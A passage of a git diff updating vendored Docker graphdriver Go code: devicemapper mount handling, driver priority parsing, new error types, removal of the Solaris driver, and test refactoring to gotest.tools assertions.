path.Join(d.home, "mnt", id) - if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) { - return err + err := unix.Rmdir(mp) + if err != nil && !os.IsNotExist(err) { + logrus.WithField("storage-driver", "devicemapper").Warnf("unable to remove mount point %q: %s", mp, err) } return nil } // Get mounts a device with given id into the root filesystem -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) mp := path.Join(d.home, "mnt", id) rootFs := path.Join(mp, "rootfs") if count := d.ctr.Increment(mp); count > 1 { - return rootFs, nil + return containerfs.NewLocalContainerFS(rootFs), nil } uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } // Create the target directories if they don't exist - if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(path.Join(d.home, "mnt"), 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } - if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAndChown(mp, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) { d.ctr.Decrement(mp) - return "", err + return nil, err } // Mount the device if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil { d.ctr.Decrement(mp) - return "", err + return nil, err } - if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(rootFs, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil { d.ctr.Decrement(mp) d.DeviceSet.UnmountDevice(id, mp) - return "", err + return nil, err } idFile := path.Join(mp, "id") @@ -205,23 +228,27 @@ func (d *Driver) Get(id, mountLabel string) (string, error) { if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil { d.ctr.Decrement(mp) d.DeviceSet.UnmountDevice(id, mp) - return "", err + return nil, err } } - return rootFs, nil + return containerfs.NewLocalContainerFS(rootFs), nil } // Put unmounts a device and removes it. func (d *Driver) Put(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) mp := path.Join(d.home, "mnt", id) if count := d.ctr.Decrement(mp); count > 0 { return nil } + err := d.DeviceSet.UnmountDevice(id, mp) if err != nil { - logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err) + logrus.WithField("storage-driver", "devicemapper").Errorf("Error unmounting device %s: %v", id, err) } + return err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go index cca1fe1b38..78d05b0792 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go @@ -1,36 +1,13 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "bytes" "fmt" "os" - "path/filepath" - "syscall" ) -// FIXME: this is copy-pasted from the aufs driver. -// It should be moved into the core. - -// Mounted returns true if a mount point exists. -func Mounted(mountpoint string) (bool, error) { - mntpoint, err := os.Stat(mountpoint) - if err != nil { - if os.IsNotExist(err) { - return false, nil - } - return false, err - } - parent, err := os.Stat(filepath.Join(mountpoint, "..")) - if err != nil { - return false, err - } - mntpointSt := mntpoint.Sys().(*syscall.Stat_t) - parentSt := parent.Sys().(*syscall.Stat_t) - return mntpointSt.Dev != parentSt.Dev, nil -} - type probeData struct { fsName string magic string diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go index f0bce562b7..a9e1957393 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go @@ -1,17 +1,17 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( - "errors" "fmt" "io" "os" "path/filepath" "strings" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/storage" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" ) @@ -27,13 +27,6 @@ const ( var ( // All registered drivers drivers map[string]InitFunc - - // ErrNotSupported returned when driver is not supported. - ErrNotSupported = errors.New("driver not supported") - // ErrPrerequisites retuned when driver does not meet prerequisites. - ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)") - // ErrIncompatibleFS returned when file system is not supported. - ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver") ) //CreateOpts contains optional arguments for Create() and CreateReadWrite() @@ -68,7 +61,7 @@ type ProtoDriver interface { // Get returns the mountpoint for the layered filesystem referred // to by this id. You can optionally specify a mountLabel or "". // Returns the absolute path to the mounted layered filesystem. - Get(id, mountLabel string) (dir string, err error) + Get(id, mountLabel string) (fs containerfs.ContainerFS, err error) // Put releases the system resources for the specified id, // e.g, unmounting layered filesystem. Put(id string) error @@ -112,6 +105,23 @@ type Driver interface { DiffDriver } +// Capabilities defines a list of capabilities a driver may implement. +// These capabilities are not required; however, they do determine how a +// graphdriver can be used. +type Capabilities struct { + // Flags that this driver is capable of reproducing exactly equivalent + // diffs for read-only layers. If set, clients can rely on the driver + // for consistent tar streams, and avoid extra processing to account + // for potential differences (eg: the layer store's use of tar-split). + ReproducesExactDiffs bool +} + +// CapabilityDriver is the interface for layered file system drivers that +// can report on their Capabilities. +type CapabilityDriver interface { + Capabilities() Capabilities +} + // DiffGetterDriver is the interface for layered file system drivers that // provide a specialized function for getting file contents for tar-split. type DiffGetterDriver interface { @@ -190,7 +200,9 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err // Guess for prior driver driversMap := scanPriorDrivers(config.Root) - for _, name := range priority { + list := strings.Split(priority, ",") + logrus.Debugf("[graphdriver] priority list: %v", list) + for _, name := range list { if name == "vfs" { // don't use vfs even if there is state present. continue @@ -225,10 +237,10 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err } // Check for priority drivers first - for _, name := range priority { + for _, name := range list { driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) if err != nil { - if isDriverNotSupported(err) { + if IsDriverNotSupported(err) { continue } return nil, err @@ -240,7 +252,7 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err for name, initFunc := range drivers { driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) if err != nil { - if isDriverNotSupported(err) { + if IsDriverNotSupported(err) { continue } return nil, err @@ -250,12 +262,6 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err return nil, fmt.Errorf("No supported storage backend found") } -// isDriverNotSupported returns true if the error initializing -// the graph driver is a non-supported error. -func isDriverNotSupported(err error) bool { - return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS -} - // scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers func scanPriorDrivers(root string) map[string]bool { driversMap := make(map[string]bool) @@ -263,8 +269,39 @@ func scanPriorDrivers(root string) map[string]bool { for driver := range drivers { p := filepath.Join(root, driver) if _, err := os.Stat(p); err == nil && driver != "vfs" { - driversMap[driver] = true + if !isEmptyDir(p) { + driversMap[driver] = true + } } } return driversMap } + +// IsInitialized checks if the driver's home-directory exists and is non-empty. +func IsInitialized(driverHome string) bool { + _, err := os.Stat(driverHome) + if os.IsNotExist(err) { + return false + } + if err != nil { + logrus.Warnf("graphdriver.IsInitialized: stat failed: %v", err) + } + return !isEmptyDir(driverHome) +} + +// isEmptyDir checks if a directory is empty. It is used to check if prior +// storage-driver directories exist. If an error occurs, it also assumes the +// directory is not empty (which preserves the behavior _before_ this check +// was added) +func isEmptyDir(name string) bool { + f, err := os.Open(name) + if err != nil { + return false + } + defer f.Close() + + if _, err = f.Readdirnames(1); err == io.EOF { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go index 2891a84f3a..cd83c4e21a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go @@ -1,17 +1,19 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" -import "syscall" +import ( + "syscall" + + "golang.org/x/sys/unix" +) var ( - // Slice of drivers that should be used in an order - priority = []string{ - "zfs", - } + // List of drivers that should be used in an order + priority = "zfs" ) // Mounted checks if the given path is mounted as the fs type func Mounted(fsType FsMagic, mountPath string) (bool, error) { - var buf syscall.Statfs_t + var buf unix.Statfs_t if err := syscall.Statfs(mountPath, &buf); err != nil { return false, err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go index 5c8d0e2301..61c6b24a9c 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go @@ -1,12 +1,8 @@ -// +build linux - -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( - "path/filepath" - "syscall" - "github.com/docker/docker/pkg/mount" + "golang.org/x/sys/unix" ) const ( @@ -51,22 +47,15 @@ const ( ) var ( - // Slice of drivers that should be used in an order - priority = []string{ - "aufs", - "btrfs", - "zfs", - "overlay2", - "overlay", - "devicemapper", - "vfs", - } + // List of drivers that should be used in an order + priority = "btrfs,zfs,overlay2,aufs,overlay,devicemapper,vfs" // FsNames maps filesystem id to name of the filesystem. FsNames = map[FsMagic]string{ FsMagicAufs: "aufs", FsMagicBtrfs: "btrfs", FsMagicCramfs: "cramfs", + FsMagicEcryptfs: "ecryptfs", FsMagicExtfs: "extfs", FsMagicF2fs: "f2fs", FsMagicGPFS: "gpfs", @@ -88,14 +77,14 @@ var ( // GetFSMagic returns the filesystem id given the path. func GetFSMagic(rootpath string) (FsMagic, error) { - var buf syscall.Statfs_t - if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(rootpath, &buf); err != nil { return 0, err } return FsMagic(buf.Type), nil } -// NewFsChecker returns a checker configured for the provied FsMagic +// NewFsChecker returns a checker configured for the provided FsMagic func NewFsChecker(t FsMagic) Checker { return &fsChecker{ t: t, @@ -127,8 +116,8 @@ func (c *defaultChecker) IsMounted(path string) bool { // Mounted checks if the given path is mounted as the fs type func Mounted(fsType FsMagic, mountPath string) (bool, error) { - var buf syscall.Statfs_t - if err := syscall.Statfs(mountPath, &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(mountPath, &buf); err != nil { return false, err } return FsMagic(buf.Type) == fsType, nil diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go deleted file mode 100644 index 7daf01c32d..0000000000 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go +++ /dev/null @@ -1,97 +0,0 @@ -// +build solaris,cgo - -package graphdriver - -/* -#include -#include - -static inline struct statvfs *getstatfs(char *s) { - struct statvfs *buf; - int err; - buf = (struct statvfs *)malloc(sizeof(struct statvfs)); - err = statvfs(s, buf); - return buf; -} -*/ -import "C" -import ( - "path/filepath" - "unsafe" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/mount" -) - -const ( - // FsMagicZfs filesystem id for Zfs - FsMagicZfs = FsMagic(0x2fc12fc1) -) - -var ( - // Slice of drivers that should be used in an order - priority = []string{ - "zfs", - } - - // FsNames maps filesystem id to name of the filesystem. - FsNames = map[FsMagic]string{ - FsMagicZfs: "zfs", - } -) - -// GetFSMagic returns the filesystem id given the path. -func GetFSMagic(rootpath string) (FsMagic, error) { - return 0, nil -} - -type fsChecker struct { - t FsMagic -} - -func (c *fsChecker) IsMounted(path string) bool { - m, _ := Mounted(c.t, path) - return m -} - -// NewFsChecker returns a checker configured for the provied FsMagic -func NewFsChecker(t FsMagic) Checker { - return &fsChecker{ - t: t, - } -} - -// NewDefaultChecker returns a check that parses /proc/mountinfo to check -// if the specified path is mounted. -// No-op on Solaris. -func NewDefaultChecker() Checker { - return &defaultChecker{} -} - -type defaultChecker struct { -} - -func (c *defaultChecker) IsMounted(path string) bool { - m, _ := mount.Mounted(path) - return m -} - -// Mounted checks if the given path is mounted as the fs type -//Solaris supports only ZFS for now -func Mounted(fsType FsMagic, mountPath string) (bool, error) { - - cs := C.CString(filepath.Dir(mountPath)) - buf := C.getstatfs(cs) - - // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] - if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || - (buf.f_basetype[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath) - C.free(unsafe.Pointer(buf)) - return false, ErrPrerequisites - } - - C.free(unsafe.Pointer(buf)) - C.free(unsafe.Pointer(cs)) - return true, nil -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go new file mode 100644 index 0000000000..e6f973c397 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "gotest.tools/assert" +) + +func TestIsEmptyDir(t *testing.T) { + tmp, err := ioutil.TempDir("", "test-is-empty-dir") + assert.NilError(t, err) + defer os.RemoveAll(tmp) + + d := filepath.Join(tmp, "empty-dir") + err = os.Mkdir(d, 0755) + assert.NilError(t, err) + empty := isEmptyDir(d) + assert.Check(t, empty) + + d = filepath.Join(tmp, "dir-with-subdir") + err = os.MkdirAll(filepath.Join(d, "subdir"), 0755) + assert.NilError(t, err) + empty = isEmptyDir(d) + assert.Check(t, !empty) + + d = filepath.Join(tmp, "dir-with-empty-file") + err = os.Mkdir(d, 0755) + assert.NilError(t, err) + _, err = ioutil.TempFile(d, "file") + assert.NilError(t, err) + empty = isEmptyDir(d) + assert.Check(t, !empty) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go index 4a875608b0..1f2e8f071b 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go @@ -1,12 +1,10 @@ -// +build !linux,!windows,!freebsd,!solaris +// +build !linux,!windows,!freebsd -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" var ( - // Slice of drivers that should be used in an order - priority = []string{ - "unsupported", - } + // List of drivers that should be used in an order + priority = "unsupported" ) // GetFSMagic returns the filesystem id given the path. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go index ffd30c2950..856b575e75 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go @@ -1,10 +1,8 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" var ( - // Slice of drivers that should be used in order - priority = []string{ - "windowsfilter", - } + // List of drivers that should be used in order + priority = "windowsfilter" ) // GetFSMagic returns the filesystem id given the path. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go new file mode 100644 index 0000000000..96d3544552 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" + +const ( + // ErrNotSupported returned when driver is not supported. + ErrNotSupported NotSupportedError = "driver not supported" + // ErrPrerequisites returned when driver does not meet prerequisites. + ErrPrerequisites NotSupportedError = "prerequisites for driver not satisfied (wrong filesystem?)" + // ErrIncompatibleFS returned when file system is not supported. + ErrIncompatibleFS NotSupportedError = "backing file system is unsupported for this graph driver" +) + +// ErrUnSupported signals that the graph-driver is not supported on the current configuration +type ErrUnSupported interface { + NotSupported() +} + +// NotSupportedError signals that the graph-driver is not supported on the current configuration +type NotSupportedError string + +func (e NotSupportedError) Error() string { + return string(e) +} + +// NotSupported signals that a graph-driver is not supported. +func (e NotSupportedError) NotSupported() {} + +// IsDriverNotSupported returns true if the error initializing +// the graph driver is a non-supported error. +func IsDriverNotSupported(err error) bool { + switch err.(type) { + case ErrUnSupported: + return true + default: + return false + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go index 20826cd7d2..e1f368508a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go @@ -1,14 +1,14 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "io" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" + "github.com/sirupsen/logrus" ) var ( @@ -18,9 +18,9 @@ var ( ) // NaiveDiffDriver takes a ProtoDriver and adds the -// capability of the Diffing methods which it may or may not -// support on its own. See the comment on the exported -// NewNaiveDiffDriver function below. +// capability of the Diffing methods on the local file system, +// which it may or may not support on its own. See the comment +// on the exported NewNaiveDiffDriver function below. // Notably, the AUFS driver doesn't need to be wrapped like this. type NaiveDiffDriver struct { ProtoDriver @@ -47,10 +47,11 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err startTime := time.Now() driver := gdw.ProtoDriver - layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return nil, err } + layerFs := layerRootFs.Path() defer func() { if err != nil { @@ -70,12 +71,14 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err }), nil } - parentFs, err := driver.Get(parent, "") + parentRootFs, err := driver.Get(parent, "") if err != nil { return nil, err } defer driver.Put(parent) + parentFs := parentRootFs.Path() + changes, err := archive.ChangesDirs(layerFs, parentFs) if err != nil { return nil, err @@ -94,7 +97,7 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err // are extracted from tar's with full second precision on modified time. // We need this hack here to make sure calls within same second receive // correct result. - time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now())) + time.Sleep(time.Until(startTime.Truncate(time.Second).Add(time.Second))) return err }), nil } @@ -104,20 +107,22 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) { driver := gdw.ProtoDriver - layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return nil, err } defer driver.Put(id) + layerFs := layerRootFs.Path() parentFs := "" if parent != "" { - parentFs, err = driver.Get(parent, "") + parentRootFs, err := driver.Get(parent, "") if err != nil { return nil, err } defer driver.Put(parent) + parentFs = parentRootFs.Path() } return archive.ChangesDirs(layerFs, parentFs) @@ -130,12 +135,13 @@ func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size i driver := gdw.ProtoDriver // Mount the root filesystem so we can apply the diff/layer. - layerFs, err := driver.Get(id, "") + layerRootFs, err := driver.Get(id, "") if err != nil { return } defer driver.Put(id) + layerFs := layerRootFs.Path() options := &archive.TarOptions{UIDMaps: gdw.uidMaps, GIDMaps: gdw.gidMaps} start := time.Now().UTC() @@ -165,5 +171,5 @@ func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error) } defer driver.Put(id) - return archive.ChangesSize(layerFs, changes), nil + return archive.ChangesSize(layerFs.Path(), changes), nil } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go index def822b9a1..22de8d1781 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go @@ -1,15 +1,15 @@ // +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( - "bytes" "io" "io/ioutil" - "path/filepath" "testing" + contdriver "github.com/containerd/continuity/driver" "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" ) // DriverBenchExists benchmarks calls to exist @@ -245,15 +245,13 @@ func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, d for i := 0; i < b.N; i++ { // Read content - c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt")) + c, err := contdriver.ReadFile(root, root.Join(root.Path(), "testfile.txt")) if err != nil { b.Fatal(err) } b.StopTimer() - if bytes.Compare(c, content) != 0 { - b.Fatalf("Wrong content in file %v, expected %v", c, content) - } + assert.DeepEqual(b, content, c) b.StartTimer() } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go index 6e952de78b..e83d0bb2ad 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go @@ -1,6 +1,6 @@ -// +build linux freebsd solaris +// +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( "bytes" @@ -9,13 +9,16 @@ import ( "os" "path" "reflect" - "syscall" "testing" "unsafe" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/quota" "github.com/docker/docker/pkg/stringid" "github.com/docker/go-units" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -33,18 +36,13 @@ type Driver struct { func newDriver(t testing.TB, name string, options []string) *Driver { root, err := ioutil.TempDir("", "docker-graphtest-") - if err != nil { - t.Fatal(err) - } - - if err := os.MkdirAll(root, 0755); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, os.MkdirAll(root, 0755)) d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root}) if err != nil { t.Logf("graphdriver: %v\n", err) - if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS { + if graphdriver.IsDriverNotSupported(err) { t.Skipf("Driver %s not supported", name) } t.Fatal(err) @@ -86,14 +84,11 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str driver := GetDriver(t, drivername, driverOptions...) defer PutDriver(t) - if err := driver.Create("empty", "", nil); err != nil { - t.Fatal(err) - } + err := driver.Create("empty", "", nil) + assert.NilError(t, err) defer func() { - if err := driver.Remove("empty"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("empty")) }() if !driver.Exists("empty") { @@ -101,21 +96,14 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str } dir, err := driver.Get("empty", "") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - verifyFile(t, dir, 0755|os.ModeDir, 0, 0) + verifyFile(t, dir.Path(), 0755|os.ModeDir, 0, 0) // Verify that the directory is empty - fis, err := readDir(dir) - if err != nil { - t.Fatal(err) - } - - if len(fis) != 0 { - t.Fatal("New directory not empty") - } + fis, err := readDir(dir, dir.Path()) + assert.NilError(t, err) + assert.Check(t, is.Len(fis, 0)) driver.Put("empty") } @@ -127,9 +115,7 @@ func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...stri createBase(t, driver, "Base") defer func() { - if err := driver.Remove("Base"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Base")) }() verifyBase(t, driver, "Base") } @@ -140,21 +126,14 @@ func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...stri defer PutDriver(t) createBase(t, driver, "Base") - defer func() { - if err := driver.Remove("Base"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Base")) }() - if err := driver.Create("Snap", "Base", nil); err != nil { - t.Fatal(err) - } - + err := driver.Create("Snap", "Base", nil) + assert.NilError(t, err) defer func() { - if err := driver.Remove("Snap"); err != nil { - t.Fatal(err) - } + assert.NilError(t, driver.Remove("Snap")) }() verifyBase(t, driver, "Snap") @@ -332,7 +311,7 @@ func writeRandomFile(path string, size uint64) error { } // DriverTestSetQuota Create a driver and test setting quota. -func DriverTestSetQuota(t *testing.T, drivername string) { +func DriverTestSetQuota(t *testing.T, drivername string, required bool) { driver := GetDriver(t, drivername) defer PutDriver(t) @@ -340,19 +319,34 @@ func DriverTestSetQuota(t *testing.T, drivername string) { createOpts := &graphdriver.CreateOpts{} createOpts.StorageOpt = make(map[string]string, 1) createOpts.StorageOpt["size"] = "50M" - if err := driver.Create("zfsTest", "Base", createOpts); err != nil { + layerName := drivername + "Test" + if err := driver.CreateReadWrite(layerName, "Base", createOpts); err == quota.ErrQuotaNotSupported && !required { + t.Skipf("Quota not supported on underlying filesystem: %v", err) + } else if err != nil { t.Fatal(err) } - mountPath, err := driver.Get("zfsTest", "") + mountPath, err := driver.Get(layerName, "") if err != nil { t.Fatal(err) } quota := uint64(50 * units.MiB) - err = writeRandomFile(path.Join(mountPath, "file"), quota*2) - if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT { - t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err) + + // Try to write a file smaller than quota, and ensure it works + err = writeRandomFile(path.Join(mountPath.Path(), "smallfile"), quota/2) + if err != nil { + t.Fatal(err) } + defer os.Remove(path.Join(mountPath.Path(), "smallfile")) + // Try to write a file bigger than quota. We've already filled up half the quota, so hitting the limit should be easy + err = writeRandomFile(path.Join(mountPath.Path(), "bigfile"), quota) + if err == nil { + t.Fatalf("expected write to fail(), instead had success") + } + if pathError, ok := err.(*os.PathError); ok && pathError.Err != unix.EDQUOT && pathError.Err != unix.ENOSPC { + os.Remove(path.Join(mountPath.Path(), "bigfile")) + t.Fatalf("expect write() to fail with %v or %v, got %v", unix.EDQUOT, unix.ENOSPC, pathError.Err) + } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go index a50c5211e3..c6a03f341e 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go @@ -1 +1 @@ -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go index 35bf6d17ba..258aba7002 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go @@ -1,14 +1,13 @@ -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( "bytes" "fmt" - "io/ioutil" "math/rand" "os" - "path" "sort" + "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/stringid" @@ -36,17 +35,17 @@ func addFiles(drv graphdriver.Driver, layer string, seed int64) error { } defer drv.Put(layer) - if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), "file-a"), randomContent(64, seed), 0755); err != nil { return err } - if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil { + if err := root.MkdirAll(root.Join(root.Path(), "dir-b"), 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { return err } - return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755) + return driver.WriteFile(root, root.Join(root.Path(), "file-c"), randomContent(128*128, seed+2), 0755) } func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error { @@ -56,12 +55,12 @@ func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) e } defer drv.Put(layer) - fileContent, err := ioutil.ReadFile(path.Join(root, filename)) + fileContent, err := driver.ReadFile(root, root.Join(root.Path(), filename)) if err != nil { return err } - if bytes.Compare(fileContent, content) != 0 { + if !bytes.Equal(fileContent, content) { return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) } @@ -75,7 +74,7 @@ func addFile(drv graphdriver.Driver, layer, filename string, content []byte) err } defer drv.Put(layer) - return ioutil.WriteFile(path.Join(root, filename), content, 0755) + return driver.WriteFile(root, root.Join(root.Path(), filename), content, 0755) } func addDirectory(drv graphdriver.Driver, layer, dir string) error { @@ -85,7 +84,7 @@ func addDirectory(drv graphdriver.Driver, layer, dir string) error { } defer drv.Put(layer) - return os.MkdirAll(path.Join(root, dir), 0755) + return 